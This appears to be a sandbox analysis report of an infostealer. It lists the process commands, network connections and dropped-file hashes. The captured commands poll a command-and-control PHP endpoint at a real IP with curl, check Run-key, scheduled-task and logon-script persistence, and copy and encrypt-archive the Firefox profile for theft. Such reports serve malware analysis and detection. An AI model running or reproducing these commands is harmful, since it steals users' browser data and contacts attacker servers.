"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gqaqc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\gqaqc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\soksi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\soksi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kyngx" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\kyngx" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dcnxf" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\dcnxf" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vghme" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\vghme" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zimxc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\zimxc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\insay" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\insay" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xgcrd" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xgcrd" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bwzkv" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bwzkv" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tapmx" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tapmx" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o qyup.zip

C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe

azvw.exe -o qyup.zip

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lnntu" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\lnntu" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rxhjz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\rxhjz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pcmfo" "178.215.224.74/v10/ukyh.php?jspo=8"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\pcmfo" "178.215.224.74/v10/ukyh.php?jspo=8"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fbjwi" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\fbjwi" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wziuy" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\wziuy" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xbwcs" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xbwcs" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264

C:\Windows\SysWOW64\Robocopy.exe

robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vlkbr" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\vlkbr" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"

C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe

C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ixmow" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ixmow" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrew" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrew" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vwmok" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\vwmok" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sgckt" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=3A78C5703B2D9750556C36A3F42A4C&bsxa=1"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\sgckt" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=3A78C5703B2D9750556C36A3F42A4C&bsxa=1"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lblct" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\lblct" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hoyea" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\hoyea" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ejbkr" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ejbkr" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\stqti" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\stqti" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qoaen" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=7a0e7ff378475ac947884c10019889bc*2&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\qoaen" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=7a0e7ff378475ac947884c10019889bc*2&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tywfn" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tywfn" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\glxna" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\glxna" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ibyeu" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ibyeu" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fsduy" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\fsduy" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bqnfn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=true&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bqnfn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=true&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hbupo" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\hbupo" "178.215.224.74/v10/ukyh.php?jspo=6"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 WYEKIpcBRejRrpSfXIwIdpR.WYEKIpcBRejRrpSfXIwIdpR udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
NL 178.215.224.252:80 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
US 8.8.8.8:53 74.224.215.178.in-addr.arpa udp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
US 8.8.8.8:53 GyxNFpxuLvDE.GyxNFpxuLvDE udp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
NL 178.215.224.252:80 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
NL 178.215.224.74:80 178.215.224.74 tcp
US 8.8.8.8:53 udp

Files

C:\Users\Admin\AppData\Local\Temp\Tuition

MD5 cec47644f0f51a10cce5656a87673d71
SHA1 b7abebf08227a9860d7300128a9161841a4b191f
SHA256 34f31de17e65a33977c52d925c766af16d01e97ed9dd84f72048f1a9b5cb269e
SHA512 42ead80a00f47d02074b131e9b54037840ce182b963fe0b1a279d6a851fd300dd0be355503308ad489646e52f081fa46f76e76f915e01162b8b061764663c167

C:\Users\Admin\AppData\Local\Temp\Slovenia

MD5 1332165a90a96d564adbea76842051de
SHA1 6a99c791f8a492ecccf5ada0b77be493a61b1bc9
SHA256 e9edb0d724fc9f115572c847bc1d0c63b9a53d577771bd62384ba145ccc8ff36
SHA512 d6f3da7a6d6c1c8d6219a6c1512e693dbc9e06db9906d1a0e50da90971a13efdf26b413a713b46e71583b1878271ab8795e9aecf82a59359b5114248c4ef4bc6

C:\Users\Admin\AppData\Local\Temp\Index

MD5 358194c0c510ff11f8f3d68afe5ea595
SHA1 e801c32a9b1414741a6fb2aec201d979ec927bbf
SHA256 cfb087fd56dd576f4f4db3b0930adf021950b20b65fe4c1527cb9a090e00565b
SHA512 8805cc8cb6eeb466afe5f5bea5baf3eeda3cf6f422cc761239c31656624472637d5d3a5ecfec45f134f620c34a674e8edd8b88ff36647ea4628bfcc7988fac86

C:\Users\Admin\AppData\Local\Temp\Tackle

MD5 a28ef671a2529783f795e0ce242b69a7
SHA1 3605589e946dcac4492b8a7799660ff4f1a323d1
SHA256 9d68a50b8498172bb2607b4652ed522d009e487cb0683c155805ef199274a745
SHA512 b67e45bda8d8733994f0eabeb454c5853ae5e6f06c7c49826b3995f23d2a5909ac0678f7e810dd7c78fbe3c25a46c996e1b55cc2f880aabcb343979b88448aa8

C:\Users\Admin\AppData\Local\Temp\Heather

MD5 5ebe13d4704e614c4e597bed036a2591
SHA1 b6a40f939e04c997482307fb14126e716efafb2b
SHA256 3b65ae5300550700ece120dade16b6a47ceda16b437853eda1d5c4358d990712
SHA512 ee436b9624eb7eed3c4ae94637a9f13e53cd8da340aad4850cd9c8b8a7d98545623579cb34829ffe04904274033ae7f90f2d18f9dc1ecf260294c76cce943c36

C:\Users\Admin\AppData\Local\Temp\Column

MD5 d05e382bb4f1e9bb4bce6108e318ea6b
SHA1 ae0344388bc8d4e10a93c305c1f80bc60ab7bd7a
SHA256 ccd218caebb98be70e2caf40b17d54510571e48efa475cdce3c2f71581232a51
SHA512 742980e178aa801829c623ab9ff4d494d8555e2ef26542abdaf46b47fcf521ccf8dd7bf248ff98f1104a8fb18606c84bb4ca198df3ee28b96525bccae7a06d80

C:\Users\Admin\AppData\Local\Temp\Environment

MD5 b6024d20dba6454f8e2df9086438fce7
SHA1 3edb339cc5960a05ab3d1ab615d4152b092ee832
SHA256 a87a9f1aee8317c1f3fd9c69ee65a569944618092cc1f6fbeb467ab2aa73cecf
SHA512 651e002fa45b48d51803fdd13ff379bf29937438df3a4001c7f935643ca1de4b5a2e4a4a376adf1b3c35b00ac1ed0856916b9d048a88a07a4d8bb989c4a62c56

C:\Users\Admin\AppData\Local\Temp\Events

MD5 67498253ff01bc79ab26bdaa2183b367
SHA1 5c6efd758ab0b450c8a9ecaeb108e9272535a3b3
SHA256 60c91ae2bed2f72dda2ff6cb4deb1367a437df370be43bea1b7fdb58fd43fae8
SHA512 75fd5cf671a177d0c0ff18e2d088b1b6de0ef839cfd5ea410c4cfba65f26e2253983fb0ad7904cd4ba3f012b035a4682cc95ffbc35d96ad84c09ed2fc3cc19e8

C:\Users\Admin\AppData\Local\Temp\Merit

MD5 f8fef0dc6066b6bdae93db3c69368170
SHA1 e4d55d4c83b049968d5a6f4eee6ad9efe86dff79
SHA256 d945301adc544bc59bac06e95326eea938fc0e88a004bc36ab10e2eda222e374
SHA512 274311de8ddabaa6de2ad8f2266a6af3f2e306e488e272e3d6931c2edbc95437cfe0cd0f32e2818bf6daf30872d2ef1e610257f1ec85e20b7c4ba4d78d83a6c4

C:\Users\Admin\AppData\Local\Temp\Law

MD5 a57501ae52b7c24db316a678306f8083
SHA1 3cf2b2942943163781db70f6759153214fcd1c37
SHA256 8ea7d0e706039bd23733e77b84199102bcd4df8ece1e0c63daf55ed29749683c
SHA512 306de902e6f18b1acceb3bbac47b619bcd0f148a04fd634d13c0a9fdf57ec56edd688ffdd56ec6c827897209c3ffeeb362b2acfe9e1f2df348d7982e4c5626fc

C:\Users\Admin\AppData\Local\Temp\Explanation

MD5 773bc1cb8deb9ff09bc892af84ae5681
SHA1 09f815af8eca0c373302204f58b47f591a300b7c
SHA256 f97765bb2d46f5755af315c71afeb50f52f282caee0a19b9f2644946a9308d42
SHA512 e05b77521bf5c51b60a0d7e9cdc8df2c06e3a065dc3afd42d34444484941b934e36e1ce4f80fb7a86d7c1bb8935abed9070672a02a4a3c12e22a17907b0c9223

C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif

MD5 78ba0653a340bac5ff152b21a83626cc
SHA1 b12da9cb5d024555405040e65ad89d16ae749502
SHA256 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
SHA512 efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

C:\Users\Admin\AppData\Local\Temp\226443\d

MD5 7e6971c69a6ca7279da0e89b4b388189
SHA1 894fdd50dead4f46ac677ad06d1455943167ae1f
SHA256 1ae9c8851afa317293db0435ea27ad3fa8fda82a08209ee536ec947130e5c98c
SHA512 06296a0878df852fdd54fb31366d09c5c1984e1f6eaea22f1895d40a78d0ff07cf7a90bf1725becc630dbb33906d0764d6f314653c8f965ffdd91310c9699c0b

memory/1208-620-0x0000000004160000-0x00000000041BA000-memory.dmp

memory/1208-621-0x0000000004160000-0x00000000041BA000-memory.dmp

memory/1208-622-0x0000000004160000-0x00000000041BA000-memory.dmp

